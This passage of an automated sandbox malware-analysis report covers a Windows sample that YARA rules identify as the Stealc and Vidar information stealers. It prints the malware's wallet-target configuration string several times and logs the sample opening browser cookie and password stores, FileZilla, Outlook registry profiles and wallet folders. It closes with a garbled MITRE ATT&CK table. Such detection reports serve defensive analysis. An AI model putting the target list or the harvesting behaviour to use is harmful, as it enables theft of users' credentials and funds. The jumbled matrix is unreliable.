                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Tries to steal Mail credentials (via file / registry access)
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 1588, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected Stealc
                          Source: Yara matchFile source: 50.2.4ddf12fb51.exe.7d0e67.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2525036759.0000000000812000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.3040813931.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 1588, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 4ddf12fb51.exe PID: 9252, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 4ddf12fb51.exe PID: 9912, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 1588, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CC10C40 sqlite3_bind_zeroblob,0_2_6CC10C40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CC10D60 sqlite3_bind_parameter_name,0_2_6CC10D60
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB38EA0 sqlite3_clear_bindings,0_2_6CB38EA0

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts11
                          Native API                          		1
                          Scripting                          		1
                          DLL Side-Loading                          		11
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		12
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts2
                          Command and Scripting Interpreter                          		1
                          DLL Side-Loading                          		1
                          Extra Window Memory Injection                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory1
                          Account Discovery                          		Remote Desktop Protocol4
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          Scheduled Task/Job                          		1
                          Scheduled Task/Job                          		212
                          Process Injection                          		4
                          Obfuscated Files or Information                          		Security Account Manager3
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Email Collection                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCron1
                          Registry Run Keys / Startup Folder                          		1
                          Scheduled Task/Job                          		23
                          Software Packing                          		NTDS347
                          System Information Discovery                          		Distributed Component Object ModelInput Capture114
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                          Registry Run Keys / Startup Folder                          		1
                          DLL Side-Loading                          		LSA Secrets761
                          Security Software Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Extra Window Memory Injection                          		Cached Domain Credentials351
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
